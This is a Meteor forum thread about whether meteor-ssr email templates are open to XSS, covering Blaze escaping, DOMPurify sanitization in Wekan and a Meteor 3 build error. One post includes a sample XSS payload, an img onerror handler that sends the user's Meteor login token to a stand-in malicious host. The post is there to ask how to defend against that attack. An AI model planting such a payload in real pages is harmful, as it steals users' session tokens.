XSS possibility with meteor-ssr

harry97 · December 18, 2023, 11:37am

Does meteorhacks:ssr could potentially be vulnerable to XSS attack due to its usage of eval? If so, then how can I mitigate it?

github.com

meteorhacks/meteor-ssr/blob/7b3155e2e079d420f85079b52fc162a40497b777/lib/api.js#L29


      
            var language = options && options.language || "html";
            var compiler = Compilers[language];
            if(!compiler) {
              throw Error("Unknown language: " + language);
            }
          
            var compiled = compiler.compile(content);
            var templateFmt = "new Template('%s', function() {var view=this; return %s()})";
            var template = format(templateFmt, name, compiled);
          
            return Template[name] = eval(template);
          };

harry97 · December 18, 2023, 1:11pm

It’s not necessarily the usage of eval that’s bothering me but also how user input data is supplied to render method which open up the door to XSS.

Doesn’t Blaze by default escape provided input when you use double curly braces it escapes DOM special characters?? But when you use triply curly braces that the input is placed as is? So anything placed within {{}} gets escaped by default??

I tried to look at OSS Meteor applications in the wild and found this.

 sanitize(value) {
    return DOMPurify.sanitize(value);
  },

.attachments-galery
    each attachments
      .attachment-item
        a.attachment-thumbnail.swipebox(href="{{link}}" title="{{sanitize name}}")

Where the image title attribute gets passed through a special helper that sanitizes the input. But isn’t that what the double curly braces do already?

cc @xet7

xet7 · December 18, 2023, 3:48pm

@harry97

That Dompurity sanitize removes Javascript etc so that it does not get executed when field content is viewed.

Dompurify is used browserside:

github.com

wekan/wekan/blob/main/SECURITY.md#xss

About money, see [CONTRIBUTING.md](CONTRIBUTING.md)

Security is very important to us. If you discover any issue regarding security, please disclose
the information responsibly by sending an email to support (at) wekan.team using
[this PGP public key](support-at-wekan.team_pgp-publickey.asc) and not by
creating a GitHub issue. We will respond swiftly to fix verifiable security issues.

We thank you with a place at our hall of fame page, that is
at https://wekan.github.io/hall-of-fame

## How should reports be formatted?

```
Name: %name
Twitter: %twitter
Bug type: %bugtype
Domain: %domain
Severity: %severity
URL: %url
PoC: %poc

This file has been truncated. show original

Example why this is important:

If some attacker changes browserside input or PubSub websocket content, then it is also good to check serverside, to not allow permission etc changes:

github.com

wekan/wekan/blob/main/SECURITY.md#pubsub

About money, see [CONTRIBUTING.md](CONTRIBUTING.md)

Security is very important to us. If you discover any issue regarding security, please disclose
the information responsibly by sending an email to support (at) wekan.team using
[this PGP public key](support-at-wekan.team_pgp-publickey.asc) and not by
creating a GitHub issue. We will respond swiftly to fix verifiable security issues.

We thank you with a place at our hall of fame page, that is
at https://wekan.github.io/hall-of-fame

## How should reports be formatted?

```
Name: %name
Twitter: %twitter
Bug type: %bugtype
Domain: %domain
Severity: %severity
URL: %url
PoC: %poc

This file has been truncated. show original

xet7 · December 18, 2023, 6:45pm

@harry97

But to your actual question, is there XSS possibility with meteor-ssr.

When I look at meteor-ssr code, I don’t see anywhere code like this?

if (Meteor.isServer()) {

So it that code running clientside?

If that code would be running serverside, and templates do not have any suspicious code, maybe it could work? But I don’t really know, it does not look like it would work.

Also, does Jade work at Meteor 3 yet?

For SSR, I have my own test code here, that I just upgraded it to Meteor 2.14:

@zodern

After upgrading to Meteor 3 alpha 19, and trying to build again, I get these errors. Do you have Meteor 3 compatible version of your package, that removes clientside Javascript? Or can you make version for Meteor 3 ?

Errors prevented bundling:                    
While loading plugin `minifyRemoveClient` from package `zodern:remove-client-js`:
packages/modules-runtime.js:222:12: Cannot find module 'fibers'
at makeMissingError (packages/modules-runtime.js:222:12)
at Module.require (packages/modules-runtime.js:241:17)
at require (packages/modules-runtime.js:258:21)
at module (packages/promise.js:40:3)
at fileEvaluate (packages/modules-runtime.js:336:7)
at Module.require (packages/modules-runtime.js:238:14)
at require (packages/modules-runtime.js:258:21)
at packages/promise.js:147:15
at packages/promise.js:154:3

harry97 · December 19, 2023, 8:32am

Thank you for chipping in. Wekan is an absolute treasure trove and the more I dig in it the more gems I find. I thought Hall of fame is the best it can get but now I learnt about your security entry page. Which brings us to the question why packages like wekan-accounts-lockout and other forks you’ve under your projects aren’t published to Atmosphere??

Now onto the question:

So it that code running clientside?

If that code would be running serverside, and templates do not have any suspicious code, maybe it could work? But I don’t really know, it does not look like it would work.

In the application I’m working on, and presumably many others, meteor-ssr is used to render out email templates so if a malicious user injects some code into our application that then gets sent out to others via email then it can be used to steal the user token. Maybe like so:

<img src="fakeurl"
     onerror="$.get('//www.malicio.us/'+localStorage['Meteor.loginToken'])"
     alt="Cats suck!">

So is the way to solve it by using DOMPurify to sanitize data based to helpers? Uhhh this needs more digging. I’ve sent out an email to Peter Corey hopefully he responds back.

xet7 · December 19, 2023, 6:27pm

@harry97

why packages like wekan-accounts-lockout and other forks you’ve under your projects aren’t published to Atmosphere??

Hehe, lockout package, I forked it because I only needed 10 files from it, not all the dependencies:

Those packages aren’t published yet to Atmosphere, because I have not yet spent time to figure out how to publish those as packages to Atmosphere. Also, I don’t know yet how to upgrade them to Meteor 3.0. All help welcome. Or I just continue trying to figure it all out myself.

I have released some packages to npmjs.com

I would think, that by default Meteor runs code both client and serverside. Limiting is done with Meteor.isServer() or Meteor.isClient() .

Yes, you can use DOMPurify to sanitize HTML, SVG etc, removing any extra code. It is also possible to render as markdown, show code that was hidden as html comment, etc:

github.com

wekan/wekan/blob/main/packages/markdown/src/template-integration.js#L76


      
              }
              if (text.includes("[]") !== false) {
                // Prevent hiding info: https://wekan.github.io/hall-of-fame/invisiblebleed/
                // If markdown link does not have description, do not render markdown, instead show all of markdown source code using preformatted text.
                // Also show html comments.
                return HTML.Raw('<pre style="background-color: red;" title="Warning! Hidden markdown link description!" aria-label="Warning! Hidden markdown link description!">' + DOMPurify.sanitize(text.replace('<!--', '&lt;!--').replace('-->', '--&gt;')) + '</pre>');
              } else {
                // Prevent hiding info: https://wekan.github.io/hall-of-fame/invisiblebleed/
                // If text does not have hidden markdown link, render all markdown.
                // Also show html comments.
                return HTML.Raw(DOMPurify.sanitize(Markdown.render(text).replace('<!--', '<font color="red" title="Warning! Hidden HTML comment!" aria-label="Warning! Hidden HTML comment!">&lt;!--</font>').replace('-->', '<font color="red" title="Warning! Hidden HTML comment!" aria-label="Warning! Hidden HTML comment!">--&gt;</font>'), {ALLOW_UNKNOWN_PROTOCOLS: true}));
              }
            }));
          }

zodern · December 20, 2023, 11:07pm

I published zodern:remove-client-js@1.0.1-beta.5 which has been tested with Meteor 2.2 and Meteor 3.

xet7 · December 21, 2023, 12:39pm

@zodern

Thanks a lot ! I updated my serverside rendering example to newest Meteor 3 alpha. Clientside Javascript is removed. Serverside shows server time. It does not use MongoDB. Sure it is possible to add any database driver, npm package, or atmospherejs package.